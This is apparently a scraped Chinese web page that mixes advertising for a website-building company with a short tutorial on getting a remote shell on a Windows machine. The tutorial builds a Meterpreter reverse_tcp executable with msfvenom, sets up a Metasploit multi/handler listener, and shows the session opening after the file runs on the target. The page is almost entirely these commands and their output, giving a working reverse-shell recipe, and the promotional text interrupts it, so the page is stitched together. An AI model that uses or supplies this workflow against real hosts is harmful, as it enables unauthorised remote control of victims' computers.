重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
网络拓扑:
kaili系统版本:
注:前面的版本在生成shellcode的时候用的是msfpayload命令
创新互联建站专注于企业成都全网营销推广、网站重做改版、崇义网站定制设计、自适应品牌网站建设、H5建站、商城系统网站开发、集团公司官网建设、成都外贸网站制作、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为崇义等各大城市提供网站开发制作服务。
1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.侦听shellcode:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211
3.将生成的sehllcode上传至windows主机中并运行:
4.已经有session返回
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211
[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000
5.成功拿到shell: